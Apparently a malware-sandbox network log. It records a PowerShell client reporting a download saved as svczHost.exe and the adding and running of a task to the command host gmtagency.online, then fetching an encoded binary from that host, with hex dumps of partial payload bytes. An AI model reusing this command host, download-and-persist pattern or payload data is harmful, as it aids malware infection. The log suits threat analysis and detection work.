2024-11-15 00:01:23 UTC	1369	IN	Data Raw: 07 01 01 01 01 01 01 01 01 71 99 01 01 05 01 01 01 01 01 01 02 01 61 80 01 01 11 01 01 01 01 01 01 11 01 01 01 01 01 01 01 01 11 01 01 01 01 01 01 11 01 01 01 01 01 01 01 01 01 01 11 01 01 01 11 29 90 01 59 01 01 01 69 29 90 01 55 00 01 01 01 41 99 01 8b 04 01 01 01 71 92 01 45 ce 05 01 01 01 01 01 01 01 01 01 01 51 99 01 cd 11 01 01 31 8f 87 01 1d 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 91 87 01 29 01 01 01 f1 8d 87 01 41 00 01 01 01 01 01 01 01 01 01 01 01 11 5e 01 01 0a 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 2f 75 64 79 75 01 01 01 79 26 0d 01 01 11 01 01 01 29 0d 01 01 05 01 01 01 01 01 01 01 01 01 01 01 01 01 01 21 01 01 61 2f 6c 60 6f 60 66 64 65 09 ab 3a 01 01 41 0d 01 01 ad 3a 01 01 2d 0d Data Ascii: qa)Yi)UAqEQ1)A^/udyuy&)!a/l`o`fde:A:-
2024-11-15 00:01:23 UTC	1369	IN	Data Raw: d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 84 d5 25 01 49 8c 04 07 d6 4f 01 49 8c 0c f6 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 69 d5 25 01 49 8c 04 20 d6 4f 01 49 8c 0c 13 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4a d5 25 01 49 8c 04 1d d6 4f 01 49 8c 0c 0c d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 2f d5 25 01 49 8c 04 26 d6 4f 01 49 8c 0c 19 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 10 d5 25 01 49 8c 04 8b d6 4f 01 49 8c 0c 7a d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f5 d2 25 01 49 8c 04 9c d6 4f 01 49 8c 0c 8f d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 d6 d2 25 01 49 8c 04 a9 d6 4f 01 49 8c 0c 98 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 bb d2 25 01 49 8c 04 da d6 4f 01 49 8c 0c cd d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 9c d2 25 01 49 8c 04 df d6 Data Ascii: OI8tI%IOIOI8tIi%I OIOI8tIJ%IOIOI8tI/%I&OIOI8tI%IOIzOI8tI%IOIOI8tI%IOIOI8tI%IOIOI8tI%I
2024-11-15 00:01:23 UTC	1369	IN	Data Raw: 01 74 00 c2 49 8a d1 e8 33 ce 25 01 49 8c 04 3a db 4f 01 49 8c 0c 2d db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 14 ce 25 01 49 8c 04 2f db 4f 01 49 8c 0c 1e db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f9 cf 25 01 49 8c 04 20 db 4f 01 49 8c 0c 13 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 da cf 25 01 49 8c 04 15 db 4f 01 49 8c 0c 04 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 bf cf 25 01 49 8c 04 16 db 4f 01 49 8c 0c 09 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a0 cf 25 01 49 8c 04 5b db 4f 01 49 8c 0c 4a db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 85 cf 25 01 49 8c 04 4c db 4f 01 49 8c 0c 3f db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 66 cf 25 01 49 8c 04 71 db 4f 01 49 8c 0c 60 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4b cf 25 01 49 8c 04 92 db 4f 01 49 8c 0c 85 Data Ascii: tI3%I:OI-OI8tI%I/OIOI8tI%I OIOI8tI%IOIOI8tI%IOIOI8tI%I[OIJOI8tI%ILOI?OI8tIf%IqOI`OI8tIK%IOI
2024-11-15 00:01:23 UTC	516	IN	Data Raw: 8c 04 8e 57 90 01 49 8a 01 49 8c 0c 74 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c8 25 01 49 8c 04 76 57 90 01 49 8a 01 49 8c 0c 5c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c8 25 01 49 8c 04 5e 57 90 01 49 8a 01 49 8c 0c 44 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c8 25 01 49 8c 04 46 57 90 01 49 8a 01 49 8c 0c 2c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c8 25 01 49 8c 04 36 57 90 01 49 8a 01 49 8c 0c 14 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c8 25 01 49 8c 04 36 57 90 01 49 8a 01 49 8c 0c 44 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c8 25 01 49 8c 04 26 57 90 01 49 8a 01 49 8c 0c 2c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c9 25 01 49 8c 04 0e 57 90 01 49 8a 01 49 8c 0c 14 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c9 25 01 Data Ascii: WIItOI8tI%IvWII\OI8tI%I^WIIDOI8tIg%IFWII,OI8tIG%I6WIIOI8tI'%I6WIIDOI8tI%I&WII,OI8tI%IWIIOI8tI%
2024-11-15 00:01:23 UTC	1369	IN	Data Raw: 90 01 49 8a 01 49 8c 0c c4 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c6 25 01 49 8c 04 96 54 90 01 49 8a 01 49 8c 0c ac cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c6 25 01 49 8c 04 86 54 90 01 49 8a 01 49 8c 0c 9c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c6 25 01 49 8c 04 76 54 90 01 49 8a 01 49 8c 0c 84 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c6 25 01 49 8c 04 66 54 90 01 49 8a 01 49 8c 0c 6c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c6 25 01 49 8c 04 4e 54 90 01 49 8a 01 49 8c 0c 54 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c6 25 01 49 8c 04 36 54 90 01 49 8a 01 49 8c 0c 3c cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c7 25 01 49 8c 04 26 54 90 01 49 8a 01 49 8c 0c 24 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c7 25 01 49 8c 04 0e Data Ascii: IIOI8tI%ITIIOI8tI%ITIIOI8tIg%IvTIIOI8tIG%IfTIIlOI8tI'%INTIITOI8tI%I6TII<OI8tI%I&TII$OI8tI%I
2024-11-15 00:01:23 UTC	1369	IN	Data Raw: 25 01 49 8c 04 d6 53 90 01 49 8a 01 49 8c 0c 5c c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c3 25 01 49 8c 04 be 53 90 01 49 8a 01 49 8c 0c 44 c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c3 25 01 49 8c 04 a6 53 90 01 49 8a 01 49 8c 0c 2c c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c3 25 01 49 8c 04 8e 53 90 01 49 8a 01 49 8c 0c 14 c6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c0 25 01 49 8c 04 76 53 90 01 49 8a 01 49 8c 0c fc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c0 25 01 49 8c 04 5e 53 90 01 49 8a 01 49 8c 0c e4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c0 25 01 49 8c 04 46 53 90 01 49 8a 01 49 8c 0c cc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c0 25 01 49 8c 04 2e 53 90 01 49 8a 01 49 8c 0c bc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 Data Ascii: %ISII\OI8tIG%ISIIDOI8tI'%ISII,OI8tI%ISIIOI8tI%IvSIIOI8tI%I^SIIOI8tI%IFSIIOI8tI%I.SIIOI8tIg
2024-11-15 00:01:23 UTC	1369	IN	Data Raw: c2 49 8a d1 e8 07 bc 25 01 49 8c 04 e6 4e 90 01 49 8a 01 49 8c 0c b4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 bd 25 01 49 8c 04 ce 4e 90 01 49 8a 01 49 8c 0c a4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 bd 25 01 49 8c 04 c6 4e 90 01 49 8a 01 49 8c 0c 8c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 bd 25 01 49 8c 04 b6 4e 90 01 49 8a 01 49 8c 0c 7c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 bd 25 01 49 8c 04 ae 4e 90 01 49 8a 01 49 8c 0c 64 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 bd 25 01 49 8c 04 9e 4e 90 01 49 8a 01 49 8c 0c 4c c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 bd 25 01 49 8c 04 96 4e 90 01 49 8a 01 49 8c 0c 34 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 bd 25 01 49 8c 04 7e 4e 90 01 49 8a 01 49 8c 0c 1c c7 4f 01 49 82 38 01 74 Data Ascii: I%INIIOI8tI%INIIOI8tI%INIIOI8tI%INII\|OI8tI%INIIdOI8tIg%INIILOI8tIG%INII4OI8tI'%I~NIIOI8t
2024-11-15 00:01:23 UTC	1369	IN	Data Raw: 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b6 25 01 49 8c 04 a6 4f 90 01 49 8a 01 49 8c 0c 6c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b6 25 01 49 8c 04 a6 4f 90 01 49 8a 01 49 8c 0c 5c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b6 25 01 49 8c 04 8e 4f 90 01 49 8a 01 49 8c 0c 4c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b6 25 01 49 8c 04 7e 4f 90 01 49 8a 01 49 8c 0c 34 c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b6 25 01 49 8c 04 76 4f 90 01 49 8a 01 49 8c 0c 1c c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b6 25 01 49 8c 04 6e 4f 90 01 49 8a 01 49 8c 0c 04 c2 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b7 25 01 49 8c 04 56 4f 90 01 49 8a 01 49 8c 0c ec c3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b7 25 01 49 8c 04 3e 4f 90 01 49 8a 01 49 8c 0c d4 c3 Data Ascii: I8tI%IOIIlOI8tI%IOII\OI8tIg%IOIILOI8tIG%I~OII4OI8tI'%IvOIIOI8tI%InOIIOI8tI%IVOIIOI8tI%I>OII
2024-11-15 00:01:23 UTC	1369	IN	Data Raw: 01 49 8c 0c ec be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b3 25 01 49 8c 04 76 4a 90 01 49 8a 01 49 8c 0c e4 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b3 25 01 49 8c 04 5e 4a 90 01 49 8a 01 49 8c 0c cc be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b3 25 01 49 8c 04 46 4a 90 01 49 8a 01 49 8c 0c b4 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b0 25 01 49 8c 04 2e 4a 90 01 49 8a 01 49 8c 0c 9c be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b0 25 01 49 8c 04 1e 4a 90 01 49 8a 01 49 8c 0c 84 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b0 25 01 49 8c 04 06 4a 90 01 49 8a 01 49 8c 0c 94 be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b0 25 01 49 8c 04 ee 4b 90 01 49 8a 01 49 8c 0c 7c be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b0 25 01 49 8c 04 fe 4b 90 01 49 Data Ascii: IOI8tIG%IvJIIOI8tI'%I^JIIOI8tI%IFJIIOI8tI%I.JIIOI8tI%IJIIOI8tI%IJIIOI8tI%IKII\|OI8tIg%IKI

Timestamp	Bytes transferred	Direction	Data
2024-11-15 00:01:36 UTC	287	OUT	POST /2b4078cc626cf9f1ca848fab93b1338a6070d7977a6e0881ab4b11283b12e5b8f4d4fc9b1eda516eb3c7ff9a53861116 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gmtagency.online Content-Length: 200
2024-11-15 00:01:36 UTC	200	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 63 6f 6d 70 6c 65 74 65 64 3a 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 54 68 65 20 66 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 20 77 61 73 20 70 72 6f 63 65 73 73 65 64 20 61 6e 64 20 73 61 76 65 64 20 61 73 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 73 76 63 7a 48 6f 73 74 2e 65 78 65 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Download completed: C:\\\\Windows\\\\Temp\\\\file\"", "\"The file C:\\\\Windows\\\\Temp\\\\file was processed and saved as C:\\\\Windows\\\\Temp\\\\svczHost.exe\"", "----------"]
2024-11-15 00:01:36 UTC	949	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 00:01:36 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C6NsZj0I92K6CNrsrjDDrJYD94pcfLmbcNhVnFpCg7uKheGJvXiu5j84gXisnIQFhH4CEXIMg6T%2FgUTfsBTa%2BPn6YElbJg0mS%2FHh%2B20S8xj3sXC96sZ26RmZ0WMeBPE9uP2lnlvnFUP3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10829&sent=66262&recv=33028&lost=0&retrans=0&sent_bytes=92898056&recv_bytes=1488545&delivery_rate=47676659&cwnd=285&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8e2af7bbd974c872-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1166&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1147&delivery_rate=2479452&cwnd=252&unsent_bytes=0&cid=1e287f955ca147e6&ts=443&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-15 00:01:37 UTC	286	OUT	POST /2b4078cc626cf9f1ca848fab93b1338a6070d7977a6e0881ab4b11283b12e5b8f4d4fc9b1eda516eb3c7ff9a53861116 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gmtagency.online Content-Length: 97
2024-11-15 00:01:37 UTC	97	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 65 74 65 6c 65 20 46 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 61 64 64 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Detele File C:\\\\Windows\\\\Temp\\\\file\"", "\"add task\"", "----------"]
2024-11-15 00:01:38 UTC	944	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 00:01:38 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=056STjIve6IlOCvnfaZvBj0Sm5x7ZEJyBXVOkMkRyOXdqHD5ae86EHSAx8WEtyzHILwvMEwaHZ0StL88Mn2g0cfImbjqhBHdESLQAQW1cQBr7jXSr%2Fwd6mhK67%2B3JC4NnAj%2FVkd52vIt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2322&sent=22014&recv=11215&lost=0&retrans=0&sent_bytes=30551328&recv_bytes=795276&delivery_rate=33592920&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8e2af7c2e879afb9-ATL server-timing: cfL4;desc="?proto=TCP&rtt=19648&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1043&delivery_rate=147079&cwnd=32&unsent_bytes=0&cid=91355037d0d28b17&ts=725&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-15 00:01:41 UTC	286	OUT	POST /2b4078cc626cf9f1ca848fab93b1338a6070d7977a6e0881ab4b11283b12e5b8f4d4fc9b1eda516eb3c7ff9a53861116 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gmtagency.online Content-Length: 64
2024-11-15 00:01:41 UTC	64	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 65 74 20 74 68 75 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"run task\"", "\"ket thuc\"", "----------"]
2024-11-15 00:01:42 UTC	952	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 00:01:42 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GhhWmAaz%2BCEHa3Wrs%2FUkyTHsaNDj59xfX5FsSV%2FUEx0Y%2FyAO%2BEUaD6RunyGiZDayb9HhFo%2BoIi4m1DJezH8NfaHCXk7y3jYp5SIAvzxitXHCQPwP8zKnuuap4JXAeZ9I5NZPPE8aNvD7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9024&sent=48746&recv=25056&lost=0&retrans=35&sent_bytes=67807818&recv_bytes=1422904&delivery_rate=51802441&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8e2af7da59274566-ATL server-timing: cfL4;desc="?proto=TCP&rtt=18926&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1010&delivery_rate=153576&cwnd=32&unsent_bytes=0&cid=75834827654dc348&ts=690&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-15 00:03:11 UTC	66	OUT	GET /StaticFile/RdpService/91 HTTP/1.1 Host: gmtagency.online
2024-11-15 00:03:12 UTC	1106	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 00:03:12 GMT Content-Type: application/octet-stream Content-Length: 9429504 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image hash: 10C767E2635167724D6A03475ED8F7A9 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fma3hSTFIdUIBFy4hO567R8fH%2BMUlcQK0hc%2BexN1s1gyGcTIVMkzP2bV5ezz7oHf54xOgwlcceKWe%2BEsYFPFHfkZwCnzz8jbLQxyDDHSbEtlCQ35hoeNjzO9vRFzfIu8Xp0VbPBPamOQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=36108&sent=48801&recv=25133&lost=0&retrans=35&sent_bytes=67829647&recv_bytes=1466453&delivery_rate=51802441&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8e2afa0da985e95e-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1352&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=704&delivery_rate=2055358&cwnd=251&unsent_bytes=0&cid=25484779b86c9565&ts=751&x=0"
2024-11-15 00:03:12 UTC	263	IN	Data Raw: 16 01 cb 5b 58 5b 5b 5b 5f 5b 5b 5b a4 a4 5b 5b e3 5b 5b 5b 5b 5b 5b 5b 1b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5a 5b 5b 55 44 e1 55 5b ef 52 96 7a e3 5a 17 96 7a 0f 33 32 28 7b 2b 29 34 3c 29 3a 36 7b 38 3a 35 35 34 2f 7b 39 3e 7b 29 2e 35 7b 32 35 7b 1f 14 08 7b 36 34 3f 3e 75 56 56 51 7f 5b 5b 5b 5b 5b 5b 5b b5 b6 6d 7b f1 d7 03 28 f1 d7 03 28 f1 d7 03 28 f8 af 90 28 ff d7 03 28 81 56 02 29 e6 d7 03 28 f1 d7 02 28 77 d6 03 28 e1 53 00 29 e2 d7 03 28 e1 53 07 29 c8 d7 03 28 b9 52 06 29 f2 d7 03 28 81 56 07 29 f3 d7 03 28 f1 d7 03 28 f0 d7 03 28 e1 53 06 29 87 d7 03 28 b9 52 03 29 f0 d7 03 28 b9 52 01 29 f0 d7 03 28 09 32 38 33 f1 d7 03 28 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b Data Ascii: [X[[[_[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[Z[[UDU[RzZz32({+)4<):6{8:554/{9>{).5{25{{64?>uVVQ[[[[[[[m{(((((V)((w(S)(S)(R)(V)(((S)(R)(R)(283([[[[[[[[[[[[[[[
2024-11-15 00:03:12 UTC	1369	IN	Data Raw: 5b 88 3b 6a 3c 5b 5b 5b 5b 5b 5b 5b 5b ab 5b 79 5b 50 59 55 72 5b 65 0b 5b 5b cf 1a 5b 5b 47 47 5b c3 8a 50 5b 5b 4b 5b 5b 5b 5b 5b 1b 5a 5b 5b 5b 5b 4b 5b 5b 5b 59 5b 5b 5d 5b 5b 5b 5b 5b 5b 5b 5d 5b 5b 5b 5b 5b 5b 5b 5b 1b f5 5b 5b 5f 5b 5b 5b 5b 5b 5b 58 5b 3b da 5b 5b 4b 5b 5b 5b 5b 5b 5b 4b 5b 5b 5b 5b 5b 5b 5b 5b 4b 5b 5b 5b 5b 5b 5b 4b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 4b 5b 5b 5b 5b 92 fe 5b 53 59 5b 5b 53 90 fe 5b 27 5a 5b 5b 5b 4b f5 5b e9 5e 5b 5b 5b db f3 5b a3 dd 5e 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 7b f5 5b 17 4f 5b 5b cb f6 c2 5b 47 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b db f4 c2 5b 73 5b 5b 5b 0b f7 c2 5b 1b 5a 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b db 37 5b 9b 50 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b 5b Data Ascii: [;j<[[[[[[[[[y[PYUr[e[[[[GG[P[[K[[[[[Z[[[[K[[[Y[[][[[[[[[][[[[[[[[[[_[[[[[[X[;[[K[[[[[[K[[[[[[[[K[[[[[[K[[[[[[[[[[K[[[[[SY[[S['Z[[[K[^[[[[^[[[[[[[[[[{[O[[[G[[[[[[[[[[[[[[[[[[[[s[[[[Z[[[[[[[[[[[7[P[[[[[[[[[[[[[[[[[[[[[[[[
2024-11-15 00:03:12 UTC	1369	IN	Data Raw: 5b 13 d6 5e fb d4 03 5b 13 d6 56 ca d4 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 59 83 73 5b 13 d6 5e a0 d4 03 5b 13 d6 56 b7 d4 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 be 8c 73 5b 13 d6 5e b5 d4 03 5b 13 d6 56 84 d4 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 93 8c 73 5b 13 d6 5e ba d4 03 5b 13 d6 56 89 d4 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 f0 8c 73 5b 13 d6 5e 8f d4 03 5b 13 d6 56 9e d4 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 d5 8c 73 5b 13 d6 5e 9c d4 03 5b 13 d6 56 e3 d4 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 2a 8c 73 5b 13 d6 5e e1 d4 03 5b 13 d6 56 f0 d4 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 0f 8c 73 5b 13 d6 5e f6 d4 03 5b 13 d6 56 c5 d4 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 6c 8c 73 5b 13 d6 5e 93 d4 03 5b 13 d6 56 e2 d4 03 5b 13 d8 62 5b 2e 5a 98 13 Data Ascii: [^[V[b[.ZYs[^[V[b[.Zs[^[V[b[.Zs[^[V[b[.Zs[^[V[b[.Zs[^[V[b[.Z*s[^[V[b[.Zs[^[V[b[.Zls[^[V[b[.Z
2024-11-15 00:03:12 UTC	1369	IN	Data Raw: 03 5b 13 d6 56 65 c9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 f4 89 73 5b 13 d6 5e 13 c9 03 5b 13 d6 56 62 c9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 c9 89 73 5b 13 d6 5e 60 c9 03 5b 13 d6 56 77 c9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 2e 89 73 5b 13 d6 5e 75 c9 03 5b 13 d6 56 44 c9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 03 89 73 5b 13 d6 5e 72 c9 03 5b 13 d6 56 41 c9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 60 89 73 5b 13 d6 5e 7f c9 03 5b 13 d6 56 4e c9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 45 89 73 5b 13 d6 5e c4 c9 03 5b 13 d6 56 cb c9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 5a 89 73 5b 13 d6 5e c1 c9 03 5b 13 d6 56 d0 c9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 bf 8a 73 5b 13 d6 5e ce c9 03 5b 13 d6 56 dd c9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 9c 8a 73 Data Ascii: [Ve[b[.Zs[^[Vb[b[.Zs[^`[Vw[b[.Z.s[^u[VD[b[.Zs[^r[VA[b[.Z`s[^[VN[b[.ZEs[^[V[b[.ZZs[^[V[b[.Zs[^[V[b[.Zs
2024-11-15 00:03:12 UTC	516	IN	Data Raw: 11 96 73 5b 13 d6 5e 28 54 fd 5b 13 d0 5b 13 d6 56 5a d8 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 71 96 73 5b 13 d6 5e 00 54 fd 5b 13 d0 5b 13 d6 56 b2 d9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 51 96 73 5b 13 d6 5e 20 54 fd 5b 13 d0 5b 13 d6 56 b2 d9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 b1 97 73 5b 13 d6 5e 38 54 fd 5b 13 d0 5b 13 d6 56 8a d9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 91 97 73 5b 13 d6 5e 10 54 fd 5b 13 d0 5b 13 d6 56 b2 d9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 f1 97 73 5b 13 d6 5e 18 54 fd 5b 13 d0 5b 13 d6 56 5a d8 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 d1 97 73 5b 13 d6 5e 70 54 fd 5b 13 d0 5b 13 d6 56 b2 d9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b b2 31 97 73 5b 13 d6 5e 40 54 fd 5b 13 d0 5b 13 d6 56 ba d9 03 5b 13 d8 62 5b 2e 5a 98 13 d0 8b Data Ascii: s[^(T[[VZ[b[.Zqs[^T[[V[b[.ZQs[^ 